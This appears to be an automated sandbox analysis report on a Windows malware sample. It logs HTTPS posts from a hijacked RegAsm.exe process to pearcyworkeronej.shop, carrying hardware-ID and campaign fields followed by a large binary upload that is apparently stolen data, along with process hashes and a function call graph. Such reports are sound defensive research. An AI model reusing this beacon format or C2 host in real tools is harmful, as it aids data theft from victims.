          2024-05-04 20:22:56 UTC7079OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:57 UTC812INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:57 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=u0531n3c8smpri3m6pusq3tcu5; expires=Wed, 28-Aug-2024 14:09:36 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oipvqpsZFXf4n9p7f2CPxJKi7HjQOfFAdwgNRB4%2BjYZLbWoCvgwIjoLT4wt97eQiZ1UwU4uyBv9nKI%2B1QR%2FYku25PFm5NJp7K2Anf%2FU6qE%2BFYcPgE7lUH04G96SQ%2Fqsv8TkX4yrJRV4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb34ab9ca5522d-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:57 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 0d 0a
          Data Ascii: 10ok 81.181.54.104
          2024-05-04 20:22:57 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.449736172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:57 UTC286OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 1392
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:57 UTC1392OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:58 UTC806INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:58 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=etkps2gklluvvjodvaqpi52e66; expires=Wed, 28-Aug-2024 14:09:37 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIntNeigDXAlgh7aKY7TYUjEJQc2oeciDt79bdqjKFOOUUUI6a2B6cH1prks7f%2FuI%2BGU2f8ha4qpMDilc44tjEtuzFAyQga%2BYP7o6uWRuKSLUdRN33zxLRNoGTsAwraFxqUHL8B7jwU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb34b269ed102d-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:58 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 0d 0a
          Data Ascii: 10ok 81.181.54.104
          2024-05-04 20:22:58 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.449737172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:58 UTC288OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 585666
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 30 46 39 38 44 38 34 30 38 43 46 43 34 42 36 38 33 36 35 32 34 41 30 41 35 30 32 38 30 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 75 59 59 33 4e 49 2d 2d 0d 0a 2d 2d 62
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"960F98D8408CFC4B6836524A0A502805--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"uYY3NI----b
          2024-05-04 20:22:58 UTC15331OUTData Raw: 0d 55 b5 c0 8b e3 f7 51 92 19 98 db e4 f4 4a 22 cf b1 25 d3 b8 c9 59 79 93 f3 89 99 6e b5 a1 3b cc 98 b6 76 ea 3b e2 9d 75 ba c4 f3 8c e0 61 81 e9 83 40 07 81 6f e5 28 f0 fc e4 18 75 ae a5 c4 f9 52 5f 5b 5c 2f f7 f1 47 47 02 30 ea 67 4c e5 ac d6 4a 31 87 4a 3f c8 0c 0e 55 3e 2c 45 ac f8 8f 23 f1 b2 77 8e c4 0b 23 b9 17 94 56 0f 9b 23 7a 72 85 1f 9c 51 c2 c2 b8 2d ec 9a 39 3a 58 56 70 f5 c0 96 f3 0e f0 cc bf 13 31 db 3f 4e 42 ac 7d 6e 5d 49 76 e4 f9 0f df 07 46 f4 ed 0a e6 88 66 f3 cb 12 b9 47 ef 73 27 7d 3b fe bf 33 d9 bb f9 40 ec aa 04 3c 00 60 15 c2 a7 15 19 60 5d 0d d1 51 89 c6 dd 4e 69 08 8b da 5a 71 72 33 80 ab 7f 6d 9a fe 22 e7 71 f1 a6 22 47 cf 83 3c 3e 9c 3a 1a ee fc ed d4 f5 14 62 7a e0 75 cf b6 81 9f f5 d7 c4 dc 00 9e 97 d2 56 cf 70 e5 b3 18 08
          Data Ascii: UQJ"%Yyn;v;ua@o(uR_[\/GG0gLJ1J?U>,E#w#V#zrQ-9:XVp1?NB}n]IvFfGs'};3@<``]QNiZqr3m"q"G<>:bzuVp
          2024-05-04 20:22:58 UTC15331OUTData Raw: b4 5c b2 19 f0 5d a1 fc 03 0c f6 d1 b3 b1 9a ea f8 36 c4 ee 10 8b 51 c0 43 16 c4 e7 d0 bc 89 0d bb aa b5 f0 f1 6e 54 45 68 58 ef 31 5c 0f e8 7a 92 66 2c d9 31 48 14 4e c3 df 76 d9 2a 3a 4c 8b 01 56 bf 55 51 d8 71 35 4f d0 b0 8b b9 cd ff 72 09 38 9e a0 90 07 82 bc 90 f7 7a aa db b8 2b b5 8c 4b 8c 65 f2 8d e6 4f 1b 9e d4 fe 92 1c 68 39 5a 13 14 03 28 4e f8 de 80 61 4f 9d 36 34 6b 24 99 4a d3 65 52 61 aa f5 0e ce b7 85 8c 16 5a bf fc b2 63 56 ae 16 70 35 54 3e 49 23 80 ba b2 12 6e 61 49 98 99 19 44 e9 12 01 37 9a 35 70 e3 0e b1 7a 92 eb 45 ee a6 21 2f bc f9 7a 9f 84 74 7e 6d 5c 1d b2 78 80 1f a9 b8 4f 6c 04 94 a1 3a df 47 8f ee fd ba 42 91 c8 3c 94 b4 60 8e 70 f4 48 59 da 60 6a b0 53 30 ff e4 13 64 18 18 36 44 f3 a0 bd 71 69 8a 6b 66 14 13 e0 94 e4 bf 62 2b
          Data Ascii: \]6QCnTEhX1\zf,1HNv*:LVUQq5Or8z+KeOh9Z(NaO64k$JeRaZcVp5T>I#naID75pzE!/zt~m\xOl:GB<`pHY`jS0d6Dqikfb+
          2024-05-04 20:22:58 UTC15331OUTData Raw: 20 59 53 f6 5f 5e cb a9 af 3d a5 e9 dc 09 e6 a9 be 63 6a 02 b2 ac bb 57 ba 65 6f ed 75 87 9a c3 77 28 ee e2 1a 77 b9 8e 78 02 c1 6e e6 65 39 0c 69 72 6b 35 61 dd 31 25 b0 67 8d 55 55 fe 0b 39 59 e7 21 4c a9 08 ec 18 7d 36 7b 46 03 14 a8 64 77 50 4b b6 1d bc 51 ff de 1a 9d 08 6e 1e 69 49 ff d0 a3 ef de 17 d1 39 a0 7d 32 68 cd ea a3 bf c8 62 5d 43 31 59 db 14 4e 51 51 f5 af fb 50 40 70 6a 6c cd 48 e9 d3 67 ac 2a 7b ad 99 9e 24 80 cd 6c ba 79 59 63 4f 09 9f f4 5a 7a d5 a4 63 6b b0 34 b5 e2 5b fc 99 69 20 21 db cc 7d c8 ee ef 22 f9 be f7 f4 4e 42 d4 4e d8 58 67 48 94 87 30 b1 79 44 e5 8c 43 bd 12 07 e7 39 6a c1 db a2 5f 74 f3 9c 53 21 de 41 cd e2 b2 af b8 1d e5 46 23 f4 a1 7d 37 3a 68 57 59 2a 5f 59 35 b3 0b 4d 12 dd 66 de 81 01 00 87 38 e3 b2 99 7f 9b ad df
          Data Ascii: YS_^=cjWeouw(wxne9irk5a1%gUU9Y!L}6{FdwPKQniI9}2hb]C1YNQQP@pjlHg*{$lyYcOZzck4[i !}"NBNXgH0yDC9j_tS!AF#}7:hWY*_Y5Mf8
          2024-05-04 20:22:58 UTC15331OUTData Raw: 17 3b 0e 80 a4 69 90 b7 57 93 76 12 ce ef 64 3e 16 1c 61 30 56 c0 ba 3f 59 2b d8 0b 9c b2 ea 50 94 4c 0e 1a 0e 28 c5 72 89 6a 81 35 90 51 c3 f7 a7 34 a0 44 3c 69 9a 8f ef ed 6f 69 d9 e8 ec 6f 35 fe 45 76 d7 17 05 04 0d 5f 8d c4 74 5e c2 90 b0 e0 23 4f d3 f3 80 2e a6 89 55 94 dc df c3 9c 51 d7 1c d3 75 d8 46 bc 54 ad ca 7e 77 ae 1d 7c 83 7e 33 45 1c ba bd 60 39 41 45 05 a2 bc e7 16 7f 96 7e 49 92 c7 ba 3b 0d 87 72 71 79 13 ae 47 cc e2 f6 b7 5f 14 cd 78 54 44 0a 35 6a 30 32 aa ff e2 98 ff b5 9c 55 02 59 c9 da d9 4e 14 94 a1 f7 f0 1d bb 72 86 94 c3 47 bc be 69 d8 97 de 01 c3 6e 4a ed 82 9c a3 0f 1e 2f 95 21 b5 8f 8a 83 d2 9a 83 5c 39 a3 cb 00 72 df b1 c5 5c 90 30 ed ce 30 84 ab e2 76 b6 45 02 29 5e 8d 8d f7 46 1d 9b 8b f1 b6 fd c9 4c a4 52 3f 1b 34 98 25 98
          Data Ascii: ;iWvd>a0V?Y+PL(rj5Q4D<ioio5Ev_t^#O.UQuFT~w|~3E`9AE~I;rqyG_xTD5j02UYNrGinJ/!\9r\00vE)^FLR?4%
          2024-05-04 20:22:58 UTC15331OUTData Raw: 0c 1f 08 95 e3 02 da 3e a4 04 14 f0 c3 2f be cb 30 1e 52 3f 9e 58 5e bb 1b 5a 1a b6 e2 26 33 31 37 58 d6 fa 89 23 c3 b1 4e cf b6 38 f4 66 a9 df 92 61 d7 f4 f5 ba 7b c9 4a cc f3 a5 ab 0f eb ee 43 63 bb 5d e9 3d fa 29 39 21 19 21 08 9c b7 03 30 27 c4 9a fa fc 09 8a 7b 92 d6 ed 32 b9 e1 3f 14 3e 7c 18 a4 aa 9a 64 f6 31 6f cc cd 08 dc da 5d 8c 25 b6 f5 f2 a8 ff f8 45 91 85 f5 70 9d 7c 8b 7c 04 8b 4f 3b 6b 9a 1c dc f9 6d 27 55 c6 04 9e 90 3f 1c d8 17 27 92 b8 e5 d5 db 70 8c 66 3f 52 1e ec 7e aa 1d 22 6b 12 a4 88 a0 48 10 37 90 88 7a b8 c4 8b b8 c3 72 4e 2e 68 e7 19 dd 89 0f 90 3f be 92 1b 41 91 b8 50 f7 87 23 82 17 cd 17 02 b9 40 08 07 6a 07 02 35 b7 01 f9 03 c1 7b 4a f2 d3 b4 08 10 a9 44 d0 3f a3 35 12 7e 17 57 82 e1 80 f2 0e 48 14 82 ce 08 3d be a9 bf 7f 38
          Data Ascii: >/0R?X^Z&317X#N8fa{JCc]=)9!!0'{2?>|d1o]%Ep||O;km'U?'pf?R~"kH7zrN.h?AP#@j5{JD?5~WH=8
          2024-05-04 20:22:58 UTC15331OUTData Raw: 02 39 1a f1 af 6c 1a 88 30 19 eb 78 be 77 88 43 fe b5 9e c0 e9 4a 37 55 4f 92 c7 96 d5 80 89 72 2e bd c8 b4 76 d6 30 7d dc 9e d4 8e 30 cf da 3e 0e 53 53 d3 eb 99 99 15 db ee 7f d8 5d 80 2d c8 b5 50 16 e2 b9 6c d5 99 29 59 98 f7 31 71 c9 f1 73 58 19 ee f4 98 ec 78 7d 2a 07 6e 2a 27 81 84 a2 9d 39 74 7c 83 6e 8e 70 7c 52 c1 d1 fd 88 1c 7a 50 72 40 fa ce 57 f9 0e 88 05 96 bc 0b 1e 3a 6a cf f0 59 24 15 f1 b9 71 72 6d 3d f5 a4 70 32 05 52 3e e4 be c1 0e 20 36 f7 76 d0 41 a1 dd e8 a3 49 5d 4e 5c 80 83 4b 9c ef 73 88 b8 a6 de 11 a6 87 f7 cb a1 c4 d1 46 14 ad ad ac 8d ef ef 07 4f ae 23 76 d9 e4 a5 f7 e9 b3 a7 2b 9c fa 55 f9 c9 96 5f a8 33 6f 32 6c 66 9d eb f0 f2 1f 35 0c 38 97 00 6f f1 8d 91 48 39 eb cc 02 15 63 a9 2a 2f 17 9e 1b 83 94 f3 18 e4 15 6e ed b7 32 01
          Data Ascii: 9l0xwCJ7UOr.v0}0>SS]-Pl)Y1qsXx}*n*'9t|np|RzPr@W:jY$qrm=p2R> 6vAI]N\KsFO#v+U_3o2lf58oH9c*/n2
          2024-05-04 20:22:58 UTC15331OUTData Raw: 4c b2 e5 e2 f9 47 23 7b e6 e2 82 9f f7 6e 9a 3d d5 db e7 c2 fe f4 c2 4f da fc e7 b5 9e ee 0e 6f 83 83 ce 4f de d5 6e 7d dd 99 dd bc ff f7 20 33 3e ab bf 1d b2 19 06 e4 c9 85 94 df a5 bf 3e ec f8 36 74 a8 43 1b f5 b6 58 dc 07 5e 1f 8c ec aa 8b 78 7e 21 dc 43 2c 4d 45 12 3c 2c 8b d1 b1 f2 66 c7 8d a7 45 2d cb 69 62 5d a5 74 d4 84 27 a3 ab bc 15 7c 49 88 64 29 60 da ce 29 a4 44 d7 cf 2e b0 36 bd e2 99 80 a4 cd 8a e4 04 6d d6 71 b2 b2 eb bf 4c 1a be 0d 1b 7f 33 3a bb 31 d2 db e8 ca 4f a5 dc 3e d3 55 e6 72 b3 5f 85 2a 45 7f bc 17 ab da 70 6a 24 cd a9 a5 03 55 8f 65 73 5a 2d 86 28 1b f5 1a 4d f5 c1 1e 4d 21 e8 6f 6f c5 27 8d 7c ee 05 20 f9 d4 43 23 dc 98 b8 63 82 c4 b0 86 2a 97 57 7f d7 9b 50 38 19 c8 e8 6e 2f 99 d3 2e 40 56 ad 4a 0d f3 fc 9e 50 67 d1 49 78 94
          Data Ascii: LG#{n=OoOn} 3>>6tCX^x~!C,ME<,fE-ib]t'|Id)`)D.6mqL3:1O>Ur_*Epj$UesZ-(MM!oo'| C#c*WP8n/.@VJPgIx
          2024-05-04 20:22:58 UTC15331OUTData Raw: 11 ff ef 81 d6 58 ff ca e5 35 01 5e a1 07 12 75 81 cc cd 03 08 ea bb 13 c7 ba a4 7c 7a 4d 31 8f fa a3 a8 54 4c 46 54 cc 97 91 e5 b3 b2 e9 06 c2 b7 52 d3 97 b6 5f 3b 91 e1 d4 d4 14 a4 02 bd 37 c4 e9 cc 2f 13 30 d7 05 31 1c 68 66 dc 83 53 0f fc c1 9f b5 a8 25 3e 8f 5e 2f 32 ff 25 01 4d 0e 81 57 48 81 02 43 5a af 10 80 6e 1e d8 51 03 8a 82 f0 2e 7d cf 38 aa 26 f4 9a 0c 24 39 a9 41 00 bc 58 8b f1 95 df 5a 7f ef c1 2f b2 3e 62 21 b8 64 10 dd 03 b1 01 3e 2a fc 3f ed 01 94 60 fe 4b 08 8c d9 14 1b 4c d5 05 4b c6 82 0d 8b 8c 5d 28 94 8d b8 bc 55 a8 ac 6a 6d 6c c4 0c 7c 6d 15 f2 59 c5 67 9c 2e 0d ae fb 27 34 47 09 72 a6 30 97 8f c8 b2 e6 e7 f0 c6 10 29 d4 13 08 7d a0 21 c4 9a 85 f5 e6 8a 6f bf 69 2a 7a 1c 78 81 f6 d7 0d fa 15 d0 f9 24 7c 3f fc 7c 2f 9f 48 06 1e c4
          Data Ascii: X5^u|zM1TLFTR_;7/01hfS%>^/2%MWHCZnQ.}8&$9AXZ/>b!d>*?`KLK](Ujml|mYg.'4Gr0)}!oi*zx$|?|/H
          2024-05-04 20:22:58 UTC15331OUTData Raw: f9 3f 2b 7e 78 cd d0 d4 46 da c8 53 57 aa f4 11 d7 f5 8e 84 34 16 e8 a1 5e d5 25 f8 70 a4 58 db f1 f5 f6 cb cc 60 d7 7f f7 c9 a8 b3 08 a8 57 53 5e cc 64 8c 11 e1 4f a8 93 eb 8e 7f 47 b2 85 e8 e7 40 e2 98 1a 93 f0 a7 63 9d 2a 03 35 08 ff 55 48 ac 35 36 1a 0b 7d 0c 77 9a 2f 49 12 f2 fc e9 46 a5 53 73 e9 78 7e b6 e7 77 b4 dd 01 4c 62 ae 49 45 5d ab d0 d2 1c ed ae 66 7d a8 f4 fc 59 8b f4 c7 54 bc c8 35 01 ae 5a b6 df 30 cd 8e 89 25 5a 1a 51 04 dd 15 33 14 5a fd f2 42 9f b7 05 66 71 21 1b 1a 7e e3 ef 5c 6b e2 bc e0 4d ff 7a 0a 8c 8f d4 2a fd 78 47 ce bb 73 e5 6d 44 28 65 73 f8 69 30 96 a7 a0 61 73 10 2d 75 99 fd 66 b1 2d f7 57 30 2a a2 78 ab 8e 2b 5c b7 94 97 94 fb 5d 2b ba 6b cd 43 1f e7 92 38 4e de 13 05 bf 92 d2 e3 85 9d fc 30 d7 ce f4 1c 00 7b 48 f5 3e 29
          Data Ascii: ?+~xFSW4^%pX`WS^dOG@c*5UH56}w/IFSsx~wLbIE]f}YT5Z0%ZQ3ZBfq!~\kMz*xGsmD(esi0as-uf-W0*x+\]+kC8N0{H>)
          2024-05-04 20:23:01 UTC812INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:23:01 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=hlpaj4c9ikjufuerjcmrmimipq; expires=Wed, 28-Aug-2024 14:09:40 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stAEYA8nCG0%2B3vDbALx1rOEy%2Bza6LvWMzYXdQM%2B4U3%2BvwETs5WVB1puwIGkFZw9hZIzz%2FN0G%2BJp2S8dCJ4rk4a7ZnTGqoEr6DHj7fuGwzt15Gm6Q64vKTZfXh7e1Q1yvhXweslW0H3w%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb34bb3e4908de-LAX
          alt-svc: h3=":443"; ma=86400


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:22:22:46
          Start date:04/05/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe"
          Imagebase:0xfd0000
          File size:578'048 bytes
          MD5 hash:BAB05624883FC9D5FE21F6E26C509C80
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:22:22:47
          Start date:04/05/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x760000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:0.7%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:1.7%
            Total number of Nodes:1385
            Total number of Limit Nodes:24
            execution_graph 20165 fd10f0 20168 fd6479 20165->20168 20171 fd644c 20168->20171 20172 fd645b 20171->20172 20173 fd6462 20171->20173 20177 fe1d20 20172->20177 20180 fe1d9d 20173->20180 20176 fd10f5 20178 fe1d9d 42 API calls 20177->20178 20179 fe1d32 20178->20179 20179->20176 20183 fe1ae9 20180->20183 20184 fe1af5 ___scrt_is_nonwritable_in_current_image 20183->20184 20191 fdcd04 EnterCriticalSection 20184->20191 20186 fe1b03 20192 fe1b44 20186->20192 20188 fe1b10 20202 fe1b38 20188->20202 20191->20186 20193 fe1b5f 20192->20193 20201 fe1bd2 std::_Lockit::_Lockit 20192->20201 20194 fe1bb2 20193->20194 20193->20201 20205 fec5b3 20193->20205 20196 fec5b3 42 API calls 20194->20196 20194->20201 20198 fe1bc8 20196->20198 20197 fe1ba8 20199 fe3cf6 ___free_lconv_mon 12 API calls 20197->20199 20200 fe3cf6 ___free_lconv_mon 12 API calls 20198->20200 20199->20194 20200->20201 20201->20188 20233 fdcd4c LeaveCriticalSection 20202->20233 20204 fe1b21 20204->20176 20206 fec5db 20205->20206 20207 fec5c0 20205->20207 20209 fec5ea 20206->20209 20214 fefcdf 20206->20214 20207->20206 20208 fec5cc 20207->20208 20210 fdd600 __Wcrtomb 12 API calls 20208->20210 20221 fe83e6 20209->20221 20213 fec5d1 codecvt 20210->20213 20213->20197 20215 fefcff HeapSize 20214->20215 20216 fefcea 20214->20216 20215->20209 20217 fdd600 __Wcrtomb 12 API calls 20216->20217 20218 fefcef 20217->20218 20219 fda90f __strnicoll 39 API calls 20218->20219 20220 fefcfa 20219->20220 20220->20209 20222 fe83fe 20221->20222 20223 fe83f3 20221->20223 20225 fe8406 20222->20225 20232 fe840f __Getctype 20222->20232 20224 fe3d30 std::_Locinfo::_Locinfo_dtor 13 API calls 20223->20224 20229 fe83fb 20224->20229 20226 fe3cf6 ___free_lconv_mon 12 API calls 20225->20226 20226->20229 20227 fe8439 HeapReAlloc 20227->20229 20227->20232 20228 fe8414 20230 fdd600 __Wcrtomb 12 API calls 20228->20230 20229->20213 20230->20229 20231 fe1a05 codecvt 2 API calls 20231->20232 20232->20227 20232->20228 20232->20231 20233->20204 22374 fdd6eb 22375 fde292 ___scrt_uninitialize_crt 68 API calls 22374->22375 22376 fdd6f3 22375->22376 22384 fe6485 22376->22384 22378 fdd6f8 22379 fe6530 12 API calls 22378->22379 22380 fdd707 DeleteCriticalSection 22379->22380 22380->22378 22381 fdd722 22380->22381 22382 fe3cf6 ___free_lconv_mon 12 API calls 22381->22382 22383 fdd72d 22382->22383 22385 fe6491 ___scrt_is_nonwritable_in_current_image 22384->22385 22394 fdcd04 EnterCriticalSection 22385->22394 22387 fe6508 22401 fe6527 22387->22401 22388 fe649c 22388->22387 22390 fe64dc DeleteCriticalSection 22388->22390 22395 fddf57 22388->22395 22393 fe3cf6 ___free_lconv_mon 12 API calls 22390->22393 22393->22388 22394->22388 22396 fddf6a _Fputc 22395->22396 22404 fdde32 22396->22404 22398 fddf76 22399 fda64b _Fputc 39 API calls 22398->22399 22400 fddf82 22399->22400 22400->22388 22476 fdcd4c LeaveCriticalSection 22401->22476 22403 fe6514 22403->22378 22405 fdde3e ___scrt_is_nonwritable_in_current_image 22404->22405 22406 fdde48 22405->22406 22407 fdde6b 22405->22407 22408 fda892 _Fputc 27 API calls 22406->22408 22414 fdde63 22407->22414 22415 fdd737 EnterCriticalSection 22407->22415 22408->22414 22410 fdde89 22416 fddec9 22410->22416 22412 fdde96 22430 fddec1 22412->22430 22414->22398 22415->22410 22417 fddef9 22416->22417 22418 fdded6 22416->22418 22420 fde1c4 ___scrt_uninitialize_crt 64 API calls 22417->22420 22429 fddef1 22417->22429 22419 fda892 _Fputc 27 API calls 22418->22419 22419->22429 22421 fddf11 22420->22421 22422 fe6530 12 API calls 22421->22422 22423 fddf19 22422->22423 22424 fe4c92 _Ungetc 39 API calls 22423->22424 22425 fddf25 22424->22425 22433 fe6e02 22425->22433 22428 fe3cf6 ___free_lconv_mon 12 API calls 22428->22429 22429->22412 22475 fdd74b LeaveCriticalSection 22430->22475 22432 fddec7 22432->22414 22434 fe6e2b 22433->22434 22439 fddf2c 22433->22439 22435 fe6e7a 22434->22435 22437 fe6e52 22434->22437 22436 fda892 _Fputc 27 API calls 22435->22436 22436->22439 22440 fe6d71 22437->22440 22439->22428 22439->22429 22441 fe6d7d ___scrt_is_nonwritable_in_current_image 22440->22441 22448 fea1a0 EnterCriticalSection 22441->22448 22443 fe6d8b 22444 fe6dbc 22443->22444 22449 fe6ea5 22443->22449 22462 fe6df6 22444->22462 22448->22443 22450 fea277 ___scrt_uninitialize_crt 39 API calls 22449->22450 22453 fe6eb5 22450->22453 22451 fe6ebb 22465 fea1e6 22451->22465 22453->22451 22454 fe6eed 22453->22454 22456 fea277 ___scrt_uninitialize_crt 39 API calls 22453->22456 22454->22451 22455 fea277 ___scrt_uninitialize_crt 39 API calls 22454->22455 22457 fe6ef9 CloseHandle 22455->22457 22458 fe6ee4 22456->22458 22457->22451 22459 fe6f05 GetLastError 22457->22459 22460 fea277 ___scrt_uninitialize_crt 39 API calls 22458->22460 22459->22451 22460->22454 22461 fe6f13 ___scrt_uninitialize_crt 22461->22444 22474 fea1c3 LeaveCriticalSection 22462->22474 22464 fe6ddf 22464->22439 22466 fea25c 22465->22466 22469 fea1f5 22465->22469 22467 fdd600 __Wcrtomb 12 API calls 22466->22467 